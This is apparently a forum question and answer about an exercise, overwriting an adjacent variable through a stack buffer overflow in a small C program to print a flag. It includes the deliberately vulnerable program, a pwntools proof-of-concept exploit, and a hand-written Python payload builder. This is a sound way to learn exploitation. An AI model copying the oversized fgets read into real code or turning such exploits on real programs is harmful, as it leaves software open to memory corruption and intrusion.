I am trying, as part of an exercise, to exploit a simple program by overwriting the value of a variable through a buffer overflow. I am pretty sure I have the idea behind the exploit figured out, but since I am unable to inject my code I can't know for sure.
I have tried to build a script that uses Pwntools which is good for packing integers but I haven't managed to get it to work. I also tried to read up about TTY and how you could manipulate what the terminal sends to the process.
A simple pseudocode of the program that I am exploiting:
#include <stdio.h>

const char *flag = "the flag";   /* placeholder: defined elsewhere in the real program */

void returnFlag(void) {
    puts(flag);                  /* print(flag) */
}

int main(void) {
    char input[8];               /* 8-byte buffer */
    int id = 999999;             /* the variable the overflow is meant to reach */
    fgets(input, 64, stdin);     /* reads more than 8 bytes: this is the overflow */
    if (id == 0) {               /* comparison, not assignment, is what is meant here */
        returnFlag();
    }
    return 0;
}
My plan is to overflow the variable input and overwrite the value of id with 0 so that the function returnFlag() is executed. But when I input for example "AAAA\x00\x00\x00" I only get gibberish when I look at the memory with GDB.
This problem has driven me crazy for the last 1.5 weeks and any help would be greatly appreciated.
So I figured out how to solve the problem. Hopefully this will help someone else as well.
The problem was that I did not know how to send the "exploit code" because it's made up of nulls. Fortunately there is a neat tool called Pwntools that helps you with just that.
With that tool you can interact with the program and "pack" integers so that you can send all the types of bytes necessary, including null-bytes.
A simple POC using Pwntools to exploit the program above, let's call it vuln, would look like:
#! /usr/bin/env python2
# Import everything (pwn pulls in context, process, fit and the packing helpers)
from pwn import *

context.bits = 32            # 32-bit target: fit() packs ints as 4 bytes
context.endian = 'little'
context.log_level = 'debug'  # show every byte sent and received

# '1' at offset 0, filler up to offset 8, then a packed 32-bit zero (4 NUL bytes)
pl = fit({0: '1', 8: [0x00000000]})

io = process('/vuln')        # path to the exercise binary
io.sendline(pl)              # sendline appends the newline fgets() waits for
print(io.recvlines(1))
So I first import all the libs and set up the environment that I am trying to exploit with context. Then I use the fit function. It packs all of my input in a way that I can send it to the program. I am still trying to figure out what fit is doing behind the scenes.
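To show what fit() is doing behind the scenes, and why the NUL bytes survive a pipe into fgets() but not a trip through argv or a shell variable, here is an added example that rebuilds the same payload by hand with only the standard library. It is not the answerer's code and not part of pwntools: fit_payload() is an approximation that pads gaps with a fixed filler (pwntools uses a de Bruijn pattern), and the binary path "./vuln" in send_via_stdin() is an assumption.

```python
#!/usr/bin/env python3
"""Hand-rolled equivalent of the pwntools payload above (added example, not pwntools code)."""
import struct
import subprocess


def pack_int(value, bits=32, endian="little"):
    """Pack an integer the way p32()/p64() do for the given width and endianness."""
    fmt = {"little": "<", "big": ">"}[endian] + {32: "I", 64: "Q"}[bits]
    return struct.pack(fmt, value)


def fit_payload(layout, filler=b"A", bits=32, endian="little"):
    """Approximation of pwntools fit(): each key is an offset, each value lands there.

    Gaps between entries are padded with `filler` (pwntools uses a de Bruijn
    pattern instead, which is an assumption-free difference for the exploit).
    Ints and lists of ints are packed with the chosen width; str/bytes are copied
    verbatim.  Entries must not overlap.
    """
    out = bytearray()
    for offset in sorted(layout):
        if offset < len(out):
            raise ValueError("entry at offset %d overlaps previous data" % offset)
        pad = offset - len(out)
        out += (filler * pad)[:pad]          # fill the gap up to this offset
        chunk = layout[offset]
        if isinstance(chunk, int):
            chunk = pack_int(chunk, bits, endian)
        elif isinstance(chunk, (list, tuple)):
            chunk = b"".join(pack_int(v, bits, endian) for v in chunk)
        elif isinstance(chunk, str):
            chunk = chunk.encode()
        out += chunk
    return bytes(out)


def as_c_string(payload):
    """What survives if the payload travels through argv, execve or a shell
    variable: C strings end at the first NUL, so the packed zero is cut off."""
    return payload.split(b"\x00", 1)[0]


def send_via_stdin(binary, payload):
    """fgets() reads up to a newline or EOF and keeps NUL bytes, so piping the
    raw bytes into stdin delivers the whole payload.  `binary` is an assumed
    path to the exercise program; returns whatever it printed."""
    proc = subprocess.run([binary], input=payload + b"\n",
                          stdout=subprocess.PIPE, check=False)
    return proc.stdout


if __name__ == "__main__":
    # Same layout as the pwntools script: '1' at 0, filler to 8, packed zero at 8
    payload = fit_payload({0: "1", 8: [0]})
    print(payload)                 # 12 bytes, the last four are NUL
    print(as_c_string(payload))    # only the first 8 bytes: why argv/echo fail
    # print(send_via_stdin("./vuln", payload))   # run with the exercise binary present
```

The layout assumed here is the one in the question (id directly after the 8-byte buffer); on a real binary the distance between input and id comes from disassembly or GDB, and fit_payload's offset is simply changed to match.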